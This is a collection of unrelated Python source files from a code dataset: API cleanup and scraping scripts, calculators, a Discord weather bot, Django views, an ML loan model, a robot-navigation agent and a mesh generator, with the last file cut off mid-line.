handle rendering errors\n\n if type(data) is ReturnList:\n return json.dumps({\n self.pagination_object_label: data\n })\n\n if type(data) is dict:\n errors = data.get('errors', None)\n if errors is not None:\n return json.dumps({\n 'errors': data['errors']\n })\n\n return json.dumps({\n self.object_label: data\n })","sub_path":"ratebum/apps/core/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"609165137","text":"# App to get support_action records with specific action keys.\nimport argparse\nimport requests\nimport yaml\nimport json\n\n# Get the login credentials\nparser = argparse.ArgumentParser(description='Read supporters')\nparser.add_argument('--login', dest='loginFile', action='store',\n help='YAML file with login credentials')\nparser.add_argument('--input', dest='keyFile', action='store',\n\t\t help='Backup file of supporter_action_KEY records to delete')\n\nargs = parser.parse_args()\ncred = yaml.load(open(args.loginFile))\n\n# Authenticate\npayload = {\n 'email': cred['email'],\n 'password': cred['password'],\n 'json': True }\ns = requests.Session()\nu = 'https://' + cred['host'] + '/api/authenticate.sjs'\nr = s.get(u, params=payload)\nj = r.json()\nif j['status'] == 'error':\n print('Authentication failed: ', j)\n exit(1)\n\nprint('Authentication: ', j)\n\nf = open(args.keyFile, 'r')\nkeys = [ line.split('\\t')[0] for line in f ]\nf.close()\n\n# We have a backup in the file. That means that we can just whack\n# the records without the API examining them first.\nfor key in keys:\n print(f\"{key}\")\n payload = {'json': True,\n 'object': 'supporter_action',\n 'key': key }\n u = 'https://'+ cred['host'] +'/delete'\n r = s.get(u, params=payload)\n print(f\"{key}: {r.json()}\")\n","sub_path":"supporter_action_cleanup.py","file_name":"supporter_action_cleanup.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"376662421","text":"import math\n\nprint(\"\\nChoose either 'investment' or 'bond' from the menu below to proceed:\\n\\n 1. Investement - to calculate the amount of interest you'll earn on interest.\\n 2. Bond - to calculate the amount you'll have to pay on a home loan.\\n\")\nuser_choice = input(\"Please enter your selection here: \")\n#Initial input from user\nif len(user_choice) == 0:\n print(\"**Error - no selection has been made.**\\n\")\n#Error message\nif user_choice.lower() == \"investment\":\n print(\"\\nPlease answer the following questions:\")\n deposit = float(input(\"\\n\\t 1. Please enter the amount of money that you want to invest: R\"))\n int_rate = float(input(\"\\n\\t 2. Please enter the interest rate: \"))\n years = float(input(\"\\n\\t 3. How many years would like to invest for your money for: \"))\n interest = input(\"\\n\\t 4. Would you like to earn simple or compound interest? \")\n #Investment option input from user \n interest_dec = int_rate / 100\n simple_interest = round(deposit*(1+((interest_dec)*years)), 2) \n compound_interest = round((deposit)*math.pow((1+interest_dec),years), 2) \n#Formulae \n if interest.lower() == \"simple\":\n print(\"\\nThe total amount is: R\" + str(simple_interest))\n#Simple interest option\n if interest.lower() == \"compound\":\n print(\"\\nThe total amount is: R\" + str(compound_interest)) \n#Compound interest option\nif user_choice.lower() == \"bond\":\n print(\"\\nPlease answer the following questions:\")\n house_price = float(input(\"\\n\\t1. Please enter the value of the house: \"))\n house_int_rate = float(input(\"\\n\\t2. Please enter the interest rate: \"))\n months = float(input(\"\\n\\t3. Please enter the loan term in months: \"))\n#Bond option questions\n monthly_interest = house_int_rate / 100 / 12\n bond = round((monthly_interest*house_price) / (1-(1+monthly_interest)**(-months)), 2)\n#Bond option formula\n print(\"\\nYour monthly repayment will be: R\" + str(bond))\n","sub_path":"finance_calculators.py","file_name":"finance_calculators.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496012352","text":"import os\nimport cv2\nimport numpy\n\ndir = \"C:/Users/jeffp/pytorch-CycleGAN-and-pix2pix/datasets/cervoai_pix2pix_axial\"\ndir_train = dir + \"/train\"\ndir_test = dir + \"/test\"\ndir_val = dir + \"/val\"\ndir_test_fail = dir + \"/test_fail\"\ndir_list = [dir_train, dir_test, dir_val]\nfor directory in dir_list:\n breakpoint()\n for subdir, dirs, files in os.walk(directory):\n for file in files:\n img = cv2.imread(subdir + \"/\" + file)\n if numpy.sum(img) == 0:\n print(subdir + \"/\" + file + \" does not contain an image and will be removed.\")\n os.remove(subdir + \"/\" + file)\n","sub_path":"util/remove_black_images.py","file_name":"remove_black_images.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39712109","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\nchromeDriver = \"C:\\\\Users\\\\parksoyoung\\\\Downloads\\\\chromedriver_win32\\\\chromedriver.exe\"\ndriver = webdriver.Chrome(chromeDriver)\ndriver.get('https://mobileticket.interpark.com/Goods/GoodsInfo/info?GoodsCode=20001874&is1=ticket&is2=product')\ntime.sleep(3)\n\ndriver.find_element_by_xpath('//*[@id=\"root\"]/div[@class=\"contents\"]/div[@class=\"productsInformation\"]/div[@class=\"productsTabWrap\"]'\n '/*[@id=\"productsTab\"]/ul/li[3]').click()\nelem = driver.find_element_by_tag_name(\"body\")\n\n# Get scroll height\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n for i in range(10):\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(30)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\ntime.sleep(3)\nsource = driver.page_source\nsoup = BeautifulSoup(source, \"html.parser\")\n\ndriver.quit()\n\nsports = soup.find(\"ul\", {\"id\": \"writerInfo\"})\ncomments_li =sports.find_all(\"li\")\nprint(len(comments_li))\n\nresult = pd.DataFrame()\ntitles = []\nreviews = []\nlabels = []\nrates = []\n\nfor li in comments_li:\n #print(li.find(\"div\", {\"class\": \"userBoardTitle\"}).find(\"b\").find(text=True))\n title = li.find(\"div\", {\"class\": \"userBoardTitle\"}).find(\"b\").find(text=True)\n #print(li.find(\"div\", {\"class\": \"boardContentTxt\"}).find(text=True))\n text = li.find(\"div\", {\"class\": \"boardContentTxt\"}).find(text=True)\n #print(li.find(\"div\", {\"class\": \"shareInfo\"}).find(\"div\").get(\"class\"))\n rate = li.find(\"div\", {\"class\": \"shareInfo\"}).find(\"div\").get(\"class\")\n score = int(rate[1][5:])\n #print(score)\n if score >= 8:\n label = 1\n elif score <= 6:\n label = 0\n else:\n continue\n\n titles.append(title)\n reviews.append(text)\n labels.append(label)\n rates.append(score)\n\n\n\nresult['title'] = titles\nresult['review'] = reviews\nresult['label'] = labels\nresult['rating'] = rates\n\nresult.to_csv('sports_auc.txt', encoding=\"utf8\", sep=\"\\t\")","sub_path":"data/crawling/sports_auction.py","file_name":"sports_auction.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529359140","text":"# -*- coding: utf-8 -*-\n\"\"\"Setup file for the Pigi1300 project.\n\"\"\"\n\nimport codecs\nimport os.path\nimport re\nimport sys\nfrom setuptools import setup, find_packages\n\nversion = None\nfor line in codecs.open(os.path.join('pigi1300', '__init__.py'), 'r', encoding='utf-8'):\n matcher = re.match(r\"\"\"^__version__\\s*=\\s*['\"](.*)['\"]\\s*$\"\"\", line)\n version = version or matcher and matcher.group(1)\n\n# get README content from README.md file\nwith codecs.open(os.path.join(os.path.dirname(__file__), 'README.md'), encoding='utf-8') as fd:\n long_description = fd.read()\n\nentry_points = {u'console_scripts': [u'pigi1300-manage = djangofloor.scripts:manage',\n u'pigi1300-celery = djangofloor.scripts:celery',\n u'pigi1300-gunicorn = djangofloor.scripts:gunicorn']}\n\nsetup(\n name='pigi1300',\n version=version,\n description='No description yet.',\n long_description=long_description,\n author='Matthieu Gallet',\n author_email='mgallet@19pouces.net',\n license='CeCILL-B',\n url='',\n entry_points=entry_points,\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n test_suite='pigi1300.tests',\n install_requires=['djangofloor', 'PyPDF2', 'pybarcode', 'pillow', 'pypng', 'PyQRCode', 'reportlab', 'WeasyPrint'],\n setup_requires=[],\n classifiers=[],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417578904","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom ..contacts.models import Contact\nfrom .models import OpenHouse\n\n\n@login_required\ndef kiosk_enter(request, house_key):\n open_house = get_object_or_404(OpenHouse, key=house_key)\n return render(request, 'openhouses/enter.html', {'open_house': open_house})\n\n@login_required\ndef kiosk_welcome(request, house_key):\n open_house = get_object_or_404(OpenHouse, key=house_key)\n return render(request, 'openhouses/welcome.html', {'open_house': open_house, 'associate': request.user})\n\n@login_required\ndef kiosk_form(request, house_key, kind):\n open_house = get_object_or_404(OpenHouse, key=house_key)\n assert kind in ['broker', 'buyer']\n\n if 'GET' == request.method:\n return render(request, 'openhouses/form.html', {'open_house': open_house, 'kind': kind})\n elif 'POST' == request.method:\n email = request.POST.get('email_personal')\n email_matches = Contact.objects.filter(email_personal=email)\n if email and email_matches.exists():\n contact = email_matches[0]\n else:\n contact = Contact(owner=request.user, open_house_visit=open_house)\n\n for field in Contact.EDITABLE_FIELDS:\n value = request.POST.get(field)\n if value:\n setattr(contact, field, value)\n\n agent_data = {k.split('[')[1].strip(']'): v for k,v in request.POST.items() if k.startswith('agent[')}\n if 'first_name' in agent_data and 'last_name' in agent_data:\n agent_data['name'] = \"{} {}\".format(agent_data['first_name'], agent_data['last_name'])\n\n agent_data = filter_fields(agent_data, ContactTeamMember.EDITABLE_FIELDS)\n mortgage_data = {k.split('[')[1].strip(']'): v for k,v in request.POST.items() if k.startswith('mortgage[')}\n mortgage_data = filter_fields(mortgage_data, ContactTeamMember.EDITABLE_FIELDS)\n\n if len(agent_data):\n contact.team_member_set.create(**agent_data)\n\n if len(mortgage_data):\n contact.team_member_set.create(**mortgage_data)\n\n contact.mortage_qualified = request.POST.get('mortgage_qualified') == 'true'\n contact.save()\n\n\n return redirect(open_house.kiosk_url())\n\n\ndef send_customer_email(contact, open_house):\n pass\n","sub_path":"backend/hltpy/openhouses/kiosk_views.py","file_name":"kiosk_views.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"15905765","text":"import discord\nfrom discord.ext import commands\nfrom random import randint\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\n\nprint('Discord version:', discord.__version__)\n\nprefix = '!'\n\nwith open('token_test_bot.txt', 'r') as file:\n\ttoken = file.readline()\n\nbot = commands.Bot(command_prefix=prefix)\n\nstart_time = datetime.datetime.now()\n\n@bot.event\nasync def on_ready():\n\tprint('Bot is ready!')\n\n\n@bot.command(pass_context=True)\nasync def weer(ctx, *, msg=None):\n\t'''Toont het weerbericht'''\n\n\tplaatsen_dict = {\n\t\t\"haasrode\": \"http://www.meteo-info.be/nl/europa/belgie/weer-haasrode/details/N-2733974/\",\n\t\t\"leuven\": \"http://www.meteo-info.be/nl/europa/belgie/weer-leuven/details/N-2739976/\",\n\t\t\"oostende\": \"http://www.meteo-info.be/nl/europa/belgie/weer-oostende/details/N-2743704/\",\n\t}\n\n\tte_kiezen_plaatsen = [plaats for plaats in plaatsen_dict]\n\n\tif msg not in te_kiezen_plaatsen:\n\t\tplaatsen_str = ' | '.join(te_kiezen_plaatsen)\n\t\tawait bot.say('Gebruik: `!weer { ' + plaatsen_str + ' }`')\n\n\telse:\n\t\tbezig = await bot.say('Bezig...')\n\n\t\thtml = requests.get(plaatsen_dict[msg]).text[15100:17500]\n\n\t\tsoup = BeautifulSoup(html, features=\"html.parser\")\n\t\tdiv_text = soup.find(\"div\", {\"id\": \"weather-detail-summary\"}).getText()\n\n\t\tsearch_str = 'Gem. wind: (.*) km/h\\n.*Rel. luchtvochtigheid: (.*) %\\n\\n\\n(.*)'\n\t\tm = re.search(search_str, div_text)\n\n\t\twindsnelheid, luchtvochtigheid, temperatuur = m.group(1), m.group(2), m.group(3)\n\n\t\tembed = discord.Embed(title='Weerbericht',\n\t\t\t\t\t\t\t color=randint(0, 0xffffff),\n\t\t\t\t\t\t\t description='Het weer in ' + msg)\n\t\t# color=discord.Color.green()\n\n\t\tembed.set_author(name=bot.user.name, icon_url=bot.user.avatar_url)\n\n\t\tmsg_author = ctx.message.author\n\n\t\tavatar_url = msg_author.avatar_url\n\t\tif not avatar_url:\n\t\t\tavatar_url = msg_author.default_avatar_url\n\t\tembed.set_thumbnail(url=avatar_url)\n\n\t\tembed.add_field(name='Gemiddelde windsnelheid', value=windsnelheid + ' km/h', inline=False)\n\t\tembed.add_field(name='Relatieve luchtvochtigheid', value=luchtvochtigheid + ' %', inline=False)\n\t\tembed.add_field(name='Temperatuur', value=temperatuur, inline=False)\n\t\tembed.add_field(name='Tijd', value=str(datetime.datetime.now().replace(microsecond=0)), inline=False)\n\n\t\tembed.set_footer(text='Gevraagd door ' + msg_author.display_name)\n\n\t\tawait bot.delete_message(bezig)\n\t\tawait bot.say(embed=embed)\n\t\tawait bot.send_message(msg_author, embed=embed)\n\n\n@bot.command()\nasync def uptime():\n\tawait bot.say('Uptime: ' + str(datetime.datetime.now().replace(microsecond=0) - start_time.replace(microsecond=0)))\n\n\nbot.run(token)\n","sub_path":"weer_v1.py","file_name":"weer_v1.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576107694","text":"ID_PERSISTS = 1\nID_CHANGES_AND_PERSISTS = 2\nID_RESETS = 3\n\ndef main(request, response):\n response.headers.set(\"Content-Type\", \"text/event-stream\")\n try:\n test_type = int(request.GET.first(\"type\", ID_PERSISTS))\n except:\n test_type = ID_PERSISTS\n\n if test_type == ID_PERSISTS:\n return \"id: 1\\ndata: 1\\n\\ndata:2\\n\\n\"\n\n elif test_type == ID_CHANGES_AND_PERSISTS:\n return \"id: 1\\ndata: 1\\n\\nid: 2\\ndata:2\\n\\ndata:3\\n\\n\"\n\n elif test_type == ID_RESETS:\n return \"id: 1\\ndata: 1\\n\\nid:\\ndata:2\\n\\ndata:3\\n\\n\"\n\n else:\n return \"data: invalid_test\\n\\n\"\n","sub_path":"eventsource/resources/last-event-id2.py","file_name":"last-event-id2.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"214964187","text":"#!/usr/bin/env python3\n\ndef fun1(s):\n if len(s) > 8:\n return True\n else:\n return False\n\ndef fun2(s):\n num1 = 0\n num2 = 0\n num3 = 0\n num4 = 0\n for ss in s:\n if 'a'<=ss<='z':\n num1 = 1\n elif 'A' <=ss<='Z':\n num2 = 1\n elif '0'<=ss<='9':\n num3 = 1\n else:\n num4 = 1\n\n if (num1+num2+num3+num4) >= 3:\n return True\n else:\n return False\n\ndef fun3(s):\n for i in range(len(s)-3):\n if s[i:i+3] in s[i+1:]:\n return False\n break\n return True\n\nwhile True:\n try:\n a = input()\n if fun1(a) and fun2(a) and fun3(a):\n print('OK')\n else:\n print('NG')\n\n except:\n break\n","sub_path":"huawei_jishi/20_jiandanmima.py","file_name":"20_jiandanmima.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"491840672","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\nfrom sklearn.linear_model import LogisticRegression\n\ndf = pd.read_csv('C:\\\\Users\\\\Kanishk Wadhwa\\\\MLAPP\\\\trainloan.csv')\nfor column in ['Gender','Married','Dependents','Self_Employed','Loan_Amount_Term','Credit_History']:\n df[column].fillna(df[column].mode()[0],inplace=True)\n\ndf['LoanAmount']=df['LoanAmount'].fillna(df['LoanAmount'].dropna().mean())\ndf['Dependents'] = df['Dependents'].str.rstrip('+')\ndf['Gender'] = df['Gender'].map({'Female':0,'Male':1}).astype(np.int)\ndf['Married'] = df['Married'].map({'No':0, 'Yes':1}).astype(np.int)\ndf['Education'] = df['Education'].map({'Not Graduate':0, 'Graduate':1}).astype(np.int)\ndf['Self_Employed'] = df['Self_Employed'].map({'No':0, 'Yes':1}).astype(np.int)\ndf['Loan_Status'] = df['Loan_Status'].map({'N':0, 'Y':1}).astype(np.int)\ndf['Dependents'] = df['Dependents'].astype(np.int)\n\narray =df.values\n\nX=array[:,6:10]\nX=X.astype('int')\ny=array[:,12]\ny=y.astype('int')\n#X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)\n\nlr=LogisticRegression()\nlr.fit(X,y)\n\npickle.dump(lr, open('model.pkl','wb'))\n\nmodel = pickle.load(open('model.pkl','rb'))","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653019951","text":"import wx\nimport sys\nimport praw\nimport csv\nimport os\nimport time\nimport json\n\nclass MyFrame(wx.Frame):\n \"\"\"A class with two boxes, a button and a statictext\"\"\"\n def __init__(self, parent):\n \"\"\"constructor\"\"\"\n wx.Frame.__init__(self, parent, -1, 'Easy Corpus Compiler 0.01', size=(350, 200))\n self.panel = wx.Panel(self)\n\n self.gtext = wx.TextCtrl(self.panel, -1, size =(200,-1), value=\"subreddit goes here\")\n button = wx.Button(self.panel,wx.ID_ANY, label=\"enter\", size=(100, 50))\n self.Bind(wx.EVT_BUTTON, self.yesitstrue, button)\n self.stext = wx.StaticText(self.panel,wx.ID_ANY, label='Ready')\n\n siz = wx.BoxSizer(wx.VERTICAL)\n\n siz.Add(self.gtext,1)\n siz.Add(button,1)\n siz.Add(self.stext,1)\n self.panel.SetSizer(siz)\n\n def yesitstrue(self, event):\n try:\n config = json.loads(open('config.json').read())\n pass\n except:\n dlg2 = wx.MessageDialog(self,'Please make sure that you have the config.json file present in the same folder',wx.OK)\n result2 = dlg2.ShowModal()\n dlg2.Destroy()\n if result2 == wx.ID_OK:\n self.Destroy()\n username = config['username']\n password = config['password'] \n useragent = config['userAgent']\n #login to reddit\n r = praw.Reddit(useragent)\n r.login(username, password)\n self.stext.SetLabel('Logging into Reddit.....')\n #Change to selected location\n #os.chdir(sav)\n #Folder to contain the files\n if not os.path.exists('corpus'):\n os.makedirs('corpus')\n \n \n #Get subreddit\n subrdt = self.gtext.GetValue()\n #raw_input('Please enter a subreddit to collect comments from: ')\n #set up lists\n sublist = []\n comlist = []\n #get hot submissions\n subreddit = r.get_subreddit(subrdt)\n posts = subreddit.get_hot()\n for submission in posts:\n sublist.append(submission.id)\n #set number of loops\n missionlist = len(sublist)\n mlst = str(missionlist)\n self.stext.SetLabel('There are '+mlst+' hot submissions in that subreddit.')\n #define starting point for using the list\n i = 0\n if missionlist > 100:\n missionlist = 100\n self.stext.SetLabel('That\\'s too many, I am going to parse 100 instead.')\n def cleanUp(text):\n alpha = text.encode('utf-8')\n return alpha\n \n while i < missionlist:\n submission = r.get_submission(submission_id=sublist[i])\n submission.replace_more_comments(limit=16, threshold=10)\n flat_comments = praw.helpers.flatten_tree(submission.comments)\n pstitle = submission.title.encode('ascii',errors='ignore')\n self.stext.SetLabel('Now processing: '+pstitle)\n stitle = (((submission.title.encode('ascii',errors='ignore')).replace(' ','_')).replace('\"','')).replace('/','_')\n ftitle = 'corpus/'+stitle[:40]\n file = open('corpus/'+stitle[:40]+'.csv','a')\n writer = csv.writer(file)\n writer.writerow(['Karma','Comment Body','Comment ID'])\n for comment in flat_comments: \n comtitle = comment.id\n if comment.id not in comlist:\n cleancomment = cleanUp(comment.body)\n comlist.append(comment.id)\n cleanscore = str(comment.score)\n writer.writerow([cleanscore,cleancomment,comtitle])\n file.close()\n i+=1\n time.sleep(10)\n \n self.stext.SetLabel('Done')\n\n\nif __name__ == '__main__':\n app = wx.App()\n frame = MyFrame(None)\n frame.Show()\n app.MainLoop()","sub_path":"EasyCorpusCompiler.Mac.py","file_name":"EasyCorpusCompiler.Mac.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43547126","text":"from titus_isolate import log\nfrom titus_isolate.model.processor.utils import get_workload_ids\n\n\ndef get_updates(cur_cpu, new_cpu):\n updates = {}\n for workload_id in get_workload_ids(new_cpu):\n new_thread_ids = __get_threads(new_cpu, workload_id)\n cur_thread_ids = __get_threads(cur_cpu, workload_id)\n if set(new_thread_ids) != set(cur_thread_ids):\n log.info(\"workload: '{}' updated threads from: '{}' to: '{}'\".format(workload_id, cur_thread_ids, new_thread_ids))\n updates[workload_id] = new_thread_ids\n\n return updates\n\n\ndef __get_threads(cpu, workload_id):\n return [t.get_id() for t in cpu.get_threads() if workload_id in t.get_workload_ids()]\n","sub_path":"titus_isolate/isolate/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598288895","text":"__author__ = 'Caleytown'\n\nimport numpy as np\nfrom random import randint\nimport random\nfrom networkFolder.functionList import Map, WorldEstimatingNetwork, DigitClassificationNetwork\n\n# Create the world estimating network\nuNet = WorldEstimatingNetwork()\n\n# Create the digit classification network\nclassNet = DigitClassificationNetwork()\n\n\ndef get_goal(digit):\n \"\"\"\n Returns a tuple containing\n - the goal location based on the digit\n \"\"\"\n goals = [(0, 27), (27, 27), (27, 0)]\n if digit in range(0, 3):\n goal = goals.pop(0)\n elif digit in range(3, 6):\n goal = goals.pop(1)\n elif digit in range(6, 10):\n goal = goals.pop(2)\n else:\n raise ValueError(\"Bad digit input: \" + str(digit))\n return goal\n\n\ndef compute_distance(pos1, pos2, which_dist='manhattan'):\n if which_dist == 'manhattan':\n # Manhattan distance\n dist = abs(pos1[0] - pos2[0]) + abs(pos1[1] - pos2[1])\n else:\n # Euclidean distance\n squared_dist = (pos1[0] - pos2[0]) ** 2 + (pos1[1] - pos2[1]) ** 2\n dist = np.sqrt(squared_dist)\n return dist\n\n\ndef entropy(p):\n # Compute the entropy of a probability distribution p\n log_p = np.log2(p)\n return - np.dot(p, log_p)\n\n\ndef softmax(p):\n # p: probability distribution\n return np.exp(p) / sum(np.exp(p))\n\n\ndef get_adjacent_states(position, image=None):\n \"\"\"\n returns the adjacent states to the current position\n Args:\n image: map\n position: current position of the robot\n\n Returns: dictionary of coordinates (values) of adjacent states and direction leading to those states (keys)\n\n \"\"\"\n neighbors = {}\n pos_left = [position[0] - 1, position[1]]\n pos_right = [position[0] + 1, position[1]]\n pos_up = [position[0], position[1] - 1]\n pos_down = [position[0], position[1] + 1]\n for direction, coordinates in zip(['left', 'right', 'down', 'up'], [pos_left, pos_right, pos_down, pos_up]):\n if coordinates[0] < 0 or coordinates[0] > 27 or coordinates[1] < 0 or coordinates[1] > 27:\n continue\n else:\n neighbors[direction] = coordinates\n return neighbors\n\n\ndef get_neighboring_pixels0(image, position):\n \"\"\"\n retrieve the value of the surrounding pixels at location 'position' given the map\n \"\"\"\n pixel_values = -10000 * np.ones((1, 4)).ravel() # if the position is out of the map, return -1\n\n pos_left = [position[0] - 1, position[1]]\n pos_right = [position[0] + 1, position[1]]\n pos_up = [position[0], position[1] - 1]\n pos_down = [position[0], position[1] + 1]\n for i, pos in enumerate([pos_left, pos_right, pos_down, pos_up]):\n if pos[0] < 0 or pos[0] > 27 or pos[1] < 0 or pos[1] > 27:\n continue\n else:\n pixel_values[i] = image[pos[0], pos[1]]\n return pixel_values, [pos_left, pos_right, pos_down, pos_up]\n\n\ndef get_neighboring_pixels(image, neighbors_position):\n \"\"\"\n retrieve the value of the surrounding pixels at location 'position' given the map\n \"\"\"\n pixel_values = {}\n for action in neighbors_position:\n pos = neighbors_position[action]\n # print('pos:', neighbors_position)\n pixel_values[action] = image[pos[0], pos[1]]\n return pixel_values\n\n\nclass InformedNavigator:\n def __init__(self):\n # The random navigator doesn't have any data members\n # But a more complex navigator may need to keep track of things\n # so you can create data members in this constructor\n # self.my_variable = 0\n\n # initialiaze the entropy to one to signal maximum uncertainty in the beginning\n self.better_goal_loc = None\n self.visited_locations = set()\n self.visited_locations.add((0, 0))\n self.directions = ['left', 'right', 'down', 'up']\n self.path = []\n self.alpha = 0.6\n pass\n\n def getAction(self, robot, map):\n \"\"\" Randomly selects a valid direction for the robot to travel\n\n The RandomNavigator completely ignores the incoming map of what has been seen so far.\n Maybe a smarter agent would take this additional info into account...\n \"\"\"\n\n # This loop shows how you can create a mask, an grid of 0s and 1s\n # where 0s represent unexplored areas and 1s represent explored areas\n # This mask is used by the world estimating network\n mask = np.zeros((28, 28))\n for col in range(0, 28):\n for row in range(0, 28):\n if map[col, row] != 128:\n mask[col, row] = 1\n\n # Creates an estimate of what the world looks like\n image = uNet.runNetwork(map, mask)\n\n # Use the classification network on the estimated image\n # to get a guess of what \"world\" we are in (e.g., what the MNIST digit of the world)\n char = classNet.runNetwork(image).ravel()\n output_dist = softmax(char)\n\n robot_loc = robot.getLoc()\n neighbors = get_adjacent_states(robot_loc)\n # neighbors_pixel, neighbors_position = get_neighboring_pixels(image, robot_loc)\n neighbors_pixel = get_neighboring_pixels(image, neighbors)\n # info_gain = np.zeros((1, 4))\n\n self.path.append(robot_loc)\n\n if self.better_goal_loc is not None:\n goal_loc = self.better_goal_loc\n else:\n goal_loc = get_goal(np.argmax(output_dist))\n # print(f'predicted number: {np.argmax(output_dist)} -- goal state returned: {goal_loc}')\n\n direction = None\n\n print('max probability:', max(output_dist))\n\n if max(output_dist) >= 0.40:\n alpha = 0\n else:\n alpha = self.alpha\n\n # elif self.nbr_steps % 15 == 0:\n # self.alpha = self.alpha - self.alpha * 0.05\n\n max_total_cost = -np.inf\n for action in neighbors_pixel.keys():\n info_qual = abs(image[robot_loc[0], robot_loc[1]] - neighbors_pixel[action])\n cost = compute_distance(goal_loc, neighbors[action])\n neighbor_cost = alpha * info_qual - (1 - alpha) * cost\n if neighbor_cost >= max_total_cost:\n max_total_cost = neighbor_cost\n direction = action\n new_pos = neighbors[action]\n else:\n continue\n\n # If it is not a valid move, reset\n if not robot.checkValidLoc(new_pos[0], new_pos[1]) or tuple(new_pos) in self.visited_locations:\n direction = None\n\n if direction is None:\n potential_actions = list(neighbors.keys())\n direction = random.choice(potential_actions)\n\n self.visited_locations.add(tuple(neighbors[direction]))\n return direction\n\n def reset(self):\n self.better_goal_loc = None\n self.visited_locations = set()\n self.visited_locations.add((0, 0))\n self.current_entropy = 1 # np.ones((1, 4))\n self.directions = ['left', 'right', 'down', 'up']\n self.path = []\n","sub_path":"InformedNavigator.py","file_name":"InformedNavigator.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257817802","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx_rough= np.loadtxt(\"x.out\")\ny_rough= np.loadtxt(\"y.out\")\nlen_arrays= 2*len(x_rough) + 4 #(4 corners + 4 points on the edge of the fault zone )\nheight_of_domain= 40 #(km)\n\n\n # working on the node part of dynosol 2d\n\nx = np.zeros(len_arrays)\ny= np.zeros(len_arrays)\n\nx[0]= 0.0 \t\t\t\t\t\t\t\t\t\t\t \t\t# top left corner\nx[1]= x_rough[len(x_rough)-1]\t\t\t\t\t\t\t\t\t\t\t\t\t# top right corner\n\nx[2]= x_rough[0]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# upper center left corner\nx[3:3+len(x_rough)-2]= x_rough[1: (len(x_rough)-1 )] \t\t\t\t\t\t\t\t# upper level of body of rough fault\nx[3+len(x_rough)-2]= x_rough[len(x_rough)-1]\t\t\t\t\t\t\t\t\t# upper center right corner\t\n\nx[3+len(x_rough)-2+ 1]=\tx_rough[0]\t\t\t\t\t\t\t\t\t\t\t\t# lower center left corner\nx[3+len(x_rough)-2+ 2 : 3+ 2* (len(x_rough)-2) +2 ]= x_rough[1:len(x_rough)-1] \t\t# lower level of body of rough fault\nx[3+ 2* (len(x_rough)-2) +2] = x_rough[len(x_rough)-1] \t\t\t\t\t \t\t# lower center right corner\n\nx[3+ 2* (len(x_rough)-2) +3] = 0.0 \t\t\t\t\t\t\t\t\t\t\t# lower left corner\nx[3+ 2* (len(x_rough)-2) +4] = x_rough[len(x_rough)-1] \t\t\t\t\t\t\t# lower right corner\n\n\n\ny[0]= height_of_domain \t\t\t\t\t\t\t\t\t\t# top left corner\ny[1]= height_of_domain\t\t\t\t\t\t\t\t\t\t\t\t\t\t# top right corner\n\ny[2]= 1.0 + y_rough[0] \t\t\t\t\t\t\t\t\t\t\t\t\t\t# upper center left corner\ny[3:3+len(x_rough)-2]= 1.0 + y_rough[1: (len(x_rough)-1 )] \t\t\t\t \t\t# upper level of body of rough fault\ny[3+len(x_rough)-2]= 1.0 + y_rough[len(x_rough)-1]\t\t\t\t\t\t\t\t# upper center right corner\t\n\ny[3+len(x_rough)-2+ 1]=\ty_rough[0] -1.0 \t\t\t\t\t\t\t\t\t\t\t\t\t# lower center left corner\ny[3+len(x_rough)-2+ 2 : 3+ 2* (len(x_rough)-2) +2 ]= y_rough[1:len(x_rough)-1] -1.0 \t\t\t\t\t# lower level of body of rough fault\ny[3+ 2* (len(x_rough)-2) +2] = y_rough[len(x_rough)-1] -1.0 